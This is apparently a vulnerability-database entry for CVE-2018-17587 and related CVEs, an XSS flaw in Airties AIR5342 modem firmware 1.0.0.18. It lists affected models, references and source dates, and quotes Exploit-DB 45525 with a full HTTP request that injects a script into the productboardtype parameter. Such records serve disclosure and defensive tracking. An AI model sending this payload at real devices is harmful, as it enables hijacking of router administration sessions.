ID
VAR-E-201809-0061
CVE
cve_id: | CVE-2018-17587 | Trust: 2.1 |
cve_id: | CVE-2018-17593 | Trust: 1.5 |
cve_id: | CVE-2018-17588 | Trust: 1.5 |
cve_id: | CVE-2018-17590 | Trust: 1.5 |
cve_id: | CVE-2018-17591 | Trust: 1.5 |
EDB ID
45525
TITLE
Airties AIR5342 1.0.0.18 - Cross-Site Scripting - Hardware webapps Exploit
Trust: 0.6
DESCRIPTION
Airties AIR5342 1.0.0.18 - Cross-Site Scripting. CVE-2018-17593CVE-2018-17591CVE-2018-17590CVE-2018-17588CVE-2018-17587 . webapps exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
vendor: | airties | model: | air5342 | scope: | eq | version: | 1.0.0.18 | Trust: 1.6 |
vendor: | airties | model: | air5453 | scope: | eq | version: | 1.0.0.18 | Trust: 0.5 |
vendor: | airties | model: | air5750 | scope: | eq | version: | 1.0.0.18 | Trust: 0.5 |
vendor: | airties | model: | air5021 | scope: | eq | version: | 1.0.0.18 | Trust: 0.5 |
vendor: | airties | model: | air5443v2 | scope: | eq | version: | 1.0.0.18 | Trust: 0.5 |
vendor: | airties | model: | air5343v2 | scope: | eq | version: | 1.0.0.18 | Trust: 0.5 |
EXPLOIT
# Exploit Title: Airties AIR5342 1.0.0.18 - Cross-Site Scripting
# Date: 25-09-2018
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: [https://www.airties.com/]
# Software [http://www.airties.com.tr/support/dcenter/]
# Version: [1.0.0.18]
# Affected products: AIR5342, AIR5343v2, AIR5443v2, AIR5453, AIR5442, AIR5750, AIR5650, AIR5021
# Tested on: MacOS High Sierra / Linux Mint / Windows 10
# CVE : CVE-2018-17593, CVE-2018-17590, CVE-2018-17591, CVE-2018-17588, CVE-2018-17587
# A cross site scripting vulnerability has been discovered in the AIR5342 modem of the AirTies manufacturer.
# AirTies Air 5342 devices have XSS via the top.html productboardtype parameter.
# HTTP Requests :
GET /top.html?page=main&productboardtype=%3Cscript%3Ealert(%22Ismail%20Tasdelen%22);%3C/script%3E HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Trust: 1.0
EXPLOIT LANGUAGE
txt
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
xss
Trust: 2.5
TAGS
tag: | exploit | Trust: 2.5 |
tag: | xss | Trust: 2.5 |
tag: | Cross-Site Scripting (XSS) | Trust: 1.0 |
CREDITS
Ismail Tasdelen
Trust: 0.6
EXTERNAL IDS
db: | NVD | id: | CVE-2018-17587 | Trust: 2.1 |
db: | EXPLOIT-DB | id: | 45525 | Trust: 1.6 |
db: | NVD | id: | CVE-2018-17593 | Trust: 1.5 |
db: | NVD | id: | CVE-2018-17588 | Trust: 1.5 |
db: | NVD | id: | CVE-2018-17590 | Trust: 1.5 |
db: | NVD | id: | CVE-2018-17591 | Trust: 1.5 |
db: | EDBNET | id: | 99532 | Trust: 0.6 |
db: | PACKETSTORM | id: | 149595 | Trust: 0.5 |
db: | PACKETSTORM | id: | 149600 | Trust: 0.5 |
db: | PACKETSTORM | id: | 149598 | Trust: 0.5 |
db: | PACKETSTORM | id: | 149594 | Trust: 0.5 |
db: | PACKETSTORM | id: | 149592 | Trust: 0.5 |
REFERENCES
url: | https://nvd.nist.gov/vuln/detail/cve-2018-17587 | Trust: 2.1 |
url: | https://nvd.nist.gov/vuln/detail/cve-2018-17593 | Trust: 1.5 |
url: | https://nvd.nist.gov/vuln/detail/cve-2018-17588 | Trust: 1.5 |
url: | https://nvd.nist.gov/vuln/detail/cve-2018-17590 | Trust: 1.5 |
url: | https://nvd.nist.gov/vuln/detail/cve-2018-17591 | Trust: 1.5 |
url: | https://www.exploit-db.com/exploits/45525/ | Trust: 0.6 |
SOURCES
db: | PACKETSTORM | id: | 149595 |
db: | PACKETSTORM | id: | 149600 |
db: | PACKETSTORM | id: | 149598 |
db: | PACKETSTORM | id: | 149594 |
db: | PACKETSTORM | id: | 149592 |
db: | EXPLOIT-DB | id: | 45525 |
db: | EDBNET | id: | 99532 |
LAST UPDATE DATE
2022-07-27T09:51:33.403000+00:00
SOURCES RELEASE DATE
db: | PACKETSTORM | id: | 149595 | date: | 2018-09-29T02:35:40 |
db: | PACKETSTORM | id: | 149600 | date: | 2018-09-29T03:06:13 |
db: | PACKETSTORM | id: | 149598 | date: | 2018-09-29T03:05:44 |
db: | PACKETSTORM | id: | 149594 | date: | 2018-09-29T02:35:21 |
db: | PACKETSTORM | id: | 149592 | date: | 2018-09-29T02:34:40 |
db: | EXPLOIT-DB | id: | 45525 | date: | 2018-10-03T00:00:00 |
db: | EDBNET | id: | 99532 | date: | 2018-10-03T00:00:00 |